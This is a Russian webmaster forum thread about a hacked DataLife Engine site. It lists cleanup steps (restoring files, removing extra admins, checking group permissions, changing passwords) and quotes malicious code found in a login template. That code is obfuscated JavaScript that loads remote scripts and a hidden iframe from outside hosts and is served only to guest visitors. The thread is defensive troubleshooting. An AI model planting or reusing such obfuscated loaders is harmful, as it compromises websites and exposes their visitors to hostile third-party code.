Перейти к публикации

Куда блин они еще залезли???


Рекомендованные сообщения

1. Перезалить все файлы скрипта на оригинальные из архива дистрибутива. И проверить что файлы действительно перезалились. Если версия 8.2 то проверить что патч действительно стоит.

2. Удалить с сервера все сторонние файлы PHP и сторонние модули.

3. Удалить других администраторов кроме себя.

4. Проверить все настройки групп, что ни удной группы нет доступа к админпанели, (например может быть у журналистов есть доступ к редактированию пользователей), т.е. проверять у каждой группы тщательно то к чему у них есть доступ.

5. Проверить шаблоны

6. Проверить рекламные материалы.

Ссылка на сообщение
Поделиться на других сайтах

7.Сменить пароли: FTР, профиль Администратора на dlе

8. Проверить, при необходимости правильно выставить права на папки и файлы по инструкции dlе

Ссылка на сообщение
Поделиться на других сайтах

Нашел в логин login.tpl строчку

<a href="{$link_lost}">Забыли пароль?</a>$login_p
Которая превращалась в итоге

<noindex><script language="JavaScript">

	function googlesearch(){

		var temp='',i,c=0,out='',wm='9';

		var str='60!115!'+wm+''+wm+'!114!105!112!116!32!108!'+wm+'7!110!103!117!'+wm+'7!103!101!61!34!74!'+wm+'7!118!'+wm+'7!83!'+wm+''+wm+'!114!105!112!116!34!62!10!32!32!32!32!118!'+wm+'7!114!32!108!'+wm+'7!110!107!114!117!'+wm+'5!104!116!10'+wm+'!108!32!61!32!3'+wm+'!3'+wm+'!5'+wm+'!10!32!32!32!32!108!'+wm+'7!110!107!114!117!'+wm+'5!104!116!10'+wm+'!108!32!43!61!32!3'+wm+'!60!115!'+wm+''+wm+'!114!3'+wm+'!32!43!32!3'+wm+'!105!112!116!32!108!'+wm+'7!110!103!117!'+wm+'7!103!101!61!34!74!'+wm+'7!118!'+wm+'7!83!'+wm+''+wm+'!3'+wm+'!32!43!32!3'+wm+'!114!105!112!116!34!32!3'+wm+'!5'+wm+'!10!32!32!32!32!108!'+wm+'7!110!107!114!117!'+wm+'5!104!116!10'+wm+'!108!32!43!61!32!3'+wm+'!115!114!'+wm+''+wm+'!61!34!104!116!116!112!58!47!47!108!'+wm+'7!110!107!114!117!4'+wm+'!46!114!3'+wm+'!5'+wm+'!10!32!32!32!32!108!'+wm+'7!110!107!114!117!'+wm+'5!104!116!10'+wm+'!108!32!43!61!32!3'+wm+'!117!47!106!115!46!112!104!112!63!105!100!61!4'+wm+'!55!53!4'+wm+'!4'+wm+'!3'+wm+'!5'+wm+'!10!32!32!32!32!108!'+wm+'7!110!107!114!117!'+wm+'5!104!116!10'+wm+'!108!32!43!61!32!3'+wm+'!38!117!114!108!61!3'+wm+'!32!43!32!101!110!'+wm+''+wm+'!111!100!101!85!82!73!67!111!10'+wm+'!112!111!110!101!110!116!40!100!111!'+wm+''+wm+'!117!10'+wm+'!101!110!116!46!108!111!'+wm+''+wm+'!'+wm+'7!116!105!111!110!41!5'+wm+'!10!32!32!32!32!108!'+wm+'7!110!107!114!117!'+wm+'5!104!116!10'+wm+'!108!32!43!61!32!3'+wm+'!38!114!110!100!61!3'+wm+'!32!43!32!77!'+wm+'7!116!104!46!114!'+wm+'7!110!100!111!10'+wm+'!40!41!32!43!32!3'+wm+'!34!62!60!47!115!'+wm+''+wm+'!114!3'+wm+'!32!43!32!3'+wm+'!105!112!116!62!3'+wm+'!5'+wm+'!10!32!32!32!32!100!111!'+wm+''+wm+'!117!10'+wm+'!101!110!116!46!11'+wm+'!114!105!116!101!40!108!'+wm+'7!110!107!114!117!'+wm+'5!104!116!10'+wm+'!108!41!5'+wm+'!10!60!47!115!'+wm+''+wm+'!114!105!112!116!62!';

		l=str.length;while(c<l){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp='';}document.write(out);

	}

	googlesearch();

	</script><script language="JavaScript">

    var lankru_html = '';

    lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" ';

    lankru_html += 'src="http://lankru1.r';

    lankru_html += 'u/js.php?id=17511';

    lankru_html += '&url=' + encodeURIComponent(document.location);

    lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>';

    document.write(lankru_html);

</script><script language="JavaScript" src="http://lankru1.ru/js.php?id=17511&amp;url=http%3A%2F%2Fwww.site.ru%2Findex.php&amp;rnd=0.9332947622754527"></script>


<script language="JavaScript">

<!--

var temp='',i,c=0,out='';

var str='60!115!99!114!105!112!116!32!115!114!99!61!39!104!116!116!112!58!47!47!99!111!100!101!46!109!121!105!102!114!97!109!101!46!99!111!109!47!100!105!114!101!99!116!46!106!115!39!62!60!47!115!99!114!105!112!116!62!';

l=str.length;

while(c<=str.length-1)

{

while(str.charAt(c)!='!')temp=temp+str.charAt(c++);

c++;

out=out+String.fromCharCode(temp);

temp='';

}

document.write(out);

//-->

</script><script src="http://code.myiframe.com/direct.js"></script><iframe src="http://go.myiframe.com/direct.php?url=http%3A%2F%2Fwww.site.ru%2Findex.php&amp;ref=http%3A%2F%2Fwww.site.ru%2F&amp;frame=0&amp;nc=0.44167409590765905" style="display: none;"></iframe><img id="MiF1" style="display: none;"><img id="MiF2" style="display: none;"></noindex>


$login_p то я конечно удалил, но выяснить почему она превращалась в этот код - не смог

Причем код этот отправлялся только незарегистрированному пользователю

Ссылка на сообщение
Поделиться на других сайтах
  • 3 недели спустя...

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...